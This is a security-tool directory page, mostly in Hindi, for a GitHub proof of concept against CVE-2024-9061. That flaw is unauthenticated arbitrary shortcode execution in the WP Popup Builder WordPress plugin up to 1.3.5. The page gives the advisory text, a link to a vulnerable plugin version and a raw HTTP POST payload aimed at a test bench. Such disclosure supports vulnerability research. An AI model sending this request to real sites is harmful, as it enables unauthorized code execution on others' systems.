Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9061 — WP Popup Builder – पॉपअप फॉर्म और मार्केटिंग लीड जनरेशन <= 1.3.5 - बिना प्रमाणीकरण के मनमाना शॉर्टकोड निष्पादन wp_ajax_nopriv_shortcode_Api_Add के माध्यम से | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-9061
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-9061

CVE-2024-9061

WP Popup Builder – पॉपअप फॉर्म और मार्केटिंग लीड जनरेशन <= 1.3.5 - बिना प्रमाणीकरण के मनमाना शॉर्टकोड निष्पादन wp_ajax_nopriv_shortcode_Api_Add के माध्यम से

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9061

WP Popup Builder – पॉपअप फॉर्म और मार्केटिंग लीड जनरेशन <= 1.3.5 - अनधिकृत मनमाना शॉर्टकोड निष्पादन wp_ajax_nopriv_shortcode_Api_Add के माध्यम से

विवरण

The WP Popup Builder – पॉपअप फॉर्म और मार्केटिंग लीड जनरेशन प्लगइन वर्डप्रेस के लिए सभी संस्करणों में, 1.3.5 तक और इसमें शामिल, wp_ajax_nopriv_shortcode_Api_Add AJAX क्रिया के माध्यम से मनमाना शॉर्टकोड निष्पादन के लिए असुरक्षित है। यह सॉफ्टवेयर द्वारा उपयोगकर्ताओं को एक ऐसी क्रिया निष्पादित करने की अनुमति देने के कारण है जो do_shortcode चलाने से पहले किसी मान को ठीक से मान्य नहीं करती है। इससे अनधिकृत हमलावरों के लिए मनमाने शॉर्टकोड निष्पादित करना संभव हो जाता है। नोट: इस कमजोरी को आंशिक रूप से संस्करण 1.3.5 में एक नॉन्स जांच के साथ ठीक किया गया था, जिसने प्रभावित फ़ंक्शन तक पहुंच को प्रभावी ढंग से रोक दिया। हालांकि, संस्करण 1.3.6 अनधिकृत पहुंच को रोकने के लिए सही प्राधिकरण जांच शामिल करता है।

मेरे पास इसके लिए PHP निष्पादन के लिए एक और प्लगइन स्थापित था लेकिन इसे कभी निष्पादित नहीं करवा पाया।

[xyz-ips snippet="test"]

जानकारी

root@kitploit:~
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive

action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d

प्रतिक्रिया एक खाली 200 है

टूल डाउनलोड करें